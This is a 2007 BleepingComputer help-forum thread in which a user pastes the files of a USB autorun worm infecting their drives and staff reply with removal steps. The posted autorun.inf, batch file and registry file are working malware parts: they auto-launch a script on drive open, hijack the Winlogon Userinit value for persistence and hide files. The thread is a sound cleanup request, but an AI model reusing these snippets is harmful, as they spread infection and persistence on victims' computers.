Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

My Hardisks Are Infected With Autorun.inf, Mma.bat, Mma.rar, Mma.regm Mma.vbs


  • Please log in to reply
2 replies to this topic

#1 Code_M

Code_M

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:10:11 AM

Posted 28 November 2007 - 08:26 PM

My brother downloaded a video converter into an unknown website. This is what happenned. Everytime I open a hard disk it directs me to another explorer. I tried removing it but it comes back in a minute. If anyone can help, please tell me how to remove this. Here are the steps I took. I tried removing it with NOD32 , Sopho anti-virsu. I even Used the bitdefender online scan and it can't be detected. I know this is a virus. Help me. THanks.

The contents are:
autorun.inf
mma.bat
mma.rar
mma.reg
mma.vbs

autorun.inf
Code:
[autorun]
open=
shell\open=Open(Sub7@Chatx.net)
shell\open\Command=WScript.exe .\mma.vbs
shell\open\Default=1
shell\explore=explore(Sub7@Chatx.net)
shell\explore\Command=WScript.exe .\mma.vbs


mma.bat
Code:
@echo off
if exist .\mma.reg regedit /s .\mma.reg
if not "%1"=="" goto open
if exist mma.vbs start WScript.exe mma.vbs&exit
if exist %SYSTEMROOT%\system32\mma.vbs start WScript.exe %SYSTEMROOT%\system32\mma.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if "%1"=="+" attrib +s +a +h +r %2\mma.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.inf
:end


mma.reg
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000


mma.vbs
Code:
'dranyamcram v1.0
'Davao City Phils
'September 3, 2007
'Sub7@ChatX.net

on error resume next
Set WshShell =CreateObject("WScript.Shell")


For i=1 to 1

set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

BC AdBot (Login to Remove)

 


m

#2 SpySentinel

SpySentinel

  • Staff Emeritus
  • 2,090 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The United States
  • Local time:09:11 PM

Posted 29 November 2007 - 05:14 PM

Please follow the steps below so we can make sure you're cleaned properly:

Download HijackThis™ here:
http://www.trendsecure.com/portal/en-US/th.../hijackthis.php

Click 'Do a System Scan and Save log'. The HJT log will open in notepad. Don't try to fix anything yourself.

Copy and paste the contents of the HJT log into a NEW TOPIC in "HijackThis Logs and Malware Removal"
http://www.bleepingcomputer.com/forums/f/22/virus-trojan-spyware-and-malware-removal-logs/

Also include a link to this topic. Please be patient as our HJT team members work on serveral forums.

Also you can read the Preparation Guide for use before posting a HijackThis Log

Posted Image
Unified Network of Instructors and Trained Eliminators

Posted Image

My help is always free, but if you can, please Posted Image to help me continue the fight against malware.

#3 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 50,582 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:09:11 PM

Posted 30 November 2007 - 03:42 PM

Please insert your flash drives before we begin!

Download Flash_Disinfector.exe by sUBs and save it to your desktop.
  • Double-click Flash_Disinfector.exe to run it and follow any prompts that may appear.
  • The utility may ask you to insert your flash drive and/or other removable drives. Please do so and allow the utility to clean up those drives as well.
  • Wait until it has finished scanning and then exit the program.
  • Reboot your computer when done.
Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.

Reboot your computer in "Safe Mode" or "Safe Mode With Command Prompt" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode With Command Prompt".

Go to Start > Run and type: cmd
  • press Ok.
  • At the command prompt, type in your primay drive location, usually C:
  • You may need to change the directory. If so type: cd \
  • Hit Enter.
  • Type: attrib -s -h -r -a autorun.inf
  • Hit Enter.
  • Type: dir
  • Hit Enter. This will allow you to see and confirm the Autorun files.
  • Type: del autorun.inf
  • Hit Enter.
  • Repeat the above commands for each drive on your computer.
Now search for and remove Mma.vbs, Mma.rar, Mma.regm Mma.bat if present.
  • At the command prompt, type in your primay drive location, usually C:
  • Hit Enter.
  • Type: attrib -s -h -r -a Mma.vbs
  • Hit Enter.
  • Type: dir /s Mma.vbs
  • Hit Enter.
  • If the file is present, type: del Mma.vbs
  • Hit Enter.
  • Repeat the above commands for each drive on your computer.
  • Then repeat these instructions for Mma.rar, Mma.regm Mma.bat
  • Exit the command prompt and reboot normally.
When done remove any Startup RUN values by downloading and using Autoruns.
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users